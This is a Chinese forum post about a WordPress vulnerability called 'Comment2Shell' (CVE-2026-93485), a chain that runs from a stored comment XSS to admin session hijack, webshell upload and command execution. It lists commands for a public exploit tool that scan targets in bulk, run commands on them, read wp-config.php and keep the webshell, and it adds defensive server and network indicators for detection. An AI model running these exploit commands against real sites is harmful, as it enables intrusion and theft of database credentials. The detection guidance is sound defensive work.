CVE-2026-93485

[复制链接]
发表于 昨天 12:21 | 显示全部楼层 |阅读模式
简述:

攻击者只需在评论框里填一段特殊构造的文本,等管理员打开文章看了一眼,整套攻击链就自动跑完:植入XSS→挟制管理员会话→上传Webshell→执行任意命令→Shell自毁消除痕迹。这就是CVE-2026-93485,被安全圈称为"Comment2Shell"的高危漏洞。
影响范围:

WordPress 4.7 ~ 7.1(含)
使用前提

评论功能开启 + 管理员查看文章
使用Comment2Shell工具集检测
  1. # 克隆项目
  2. git clone https://github.com/DeathShotXD/Comment2Shell.git
  3. cd Comment2Shell
  4. # 项目内包含 nuclei/templates/comment2shell.yaml
  5. nuclei -t nuclei-templates/ -l targets.txt
  6. # 版本扫描(被动检测目标WordPress版本)
  7. python3 comment2shell.py --scan -t https://target.com
  8. # 批量扫描
  9. python3 comment2shell.py --scan -f targets.txt --threads 20
  10. # 发送无害XSS探测payload(仅触发alert,不上传shell)
  11. python3 comment2shell.py --probe -t https://target.com
  12. # 带OAST回调查询
  13. python3 comment2shell.py --probe -t https://target.com \
  14.   --callback https://your-id.oast.example
  15.   
  16.   
  17. # 执行命令后自动删除webshell
  18. python3 comment2shell.py -t https://target.com -c "id"
  19. # 读取wp-config.php
  20. python3 comment2shell.py -t https://target.com -c "cat wp-config.php"
  21. # 保留webshell(不删除)
  22. python3 comment2shell.py -t https://target.com -c "id" --no-cleanup
  23. # 使用已知shell路径
  24. python3 comment2shell.py --exec -t https://target.com \
  25.   --shell-path ab12cd/ab12cd.php -c "cat wp-config.php"
复制代码
排查
  1. Server-side IoC
  2. # Suspicious comment submissions (newline in blockquote cite)
  3. grep -rE 'blockquote.*cite=.*\n' /var/www/html/wp-content/ 2>/dev/null
  4. # wp_comments table
  5. mysql -e "SELECT comment_ID, comment_author, LEFT(comment_content,200) \
  6.   FROM wp_comments WHERE comment_content LIKE '%blockquote%cite%\
  7.   onfocus%' ORDER BY comment_date DESC;"
  8. # Recently uploaded single-file plugins
  9. find /var/www/html/wp-content/plugins/ -maxdepth 2 -name "*.php" \
  10.   -newer /var/www/html/wp-config.php -not -path "*/akismet/*" \
  11.   -not -path "*/hello*"
  12. Network IoC
  13. # Unusual POST to wp-comments-post.php with blockquote + onfocus
  14. http.request.uri == "/wp-comments-post.php" AND
  15. http.request.body contains "blockquote" AND
  16. http.request.body contains "onfocus" AND
  17. http.request.body contains "autofocus"
  18. # Single-file plugin uploads from non-admin IPs
  19. http.request.uri == "/wp-admin/update.php" AND
  20. http.request.body contains "pluginzip"
复制代码
本地复现

使用vulhub情况启动


扫描检测



exp使用

Active XSS probe

RCE

失败了,那就换个github项目提供的靶场再试试
参考:

WordPress Comment2Shell漏洞分析:一条评论怎样变成服务器RCE

免责声明:如果侵犯了您的权益,请联系站长及时删除侵权内容,谢谢合作!qidao123.com:ToB企服之家,中国第一个企服评测及软件市场,开放入驻,技术点评得现金.

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

登录后关闭弹窗

登录参与点评抽奖  加入IT实名职场社区
去登录
快速回复 返回顶部 返回列表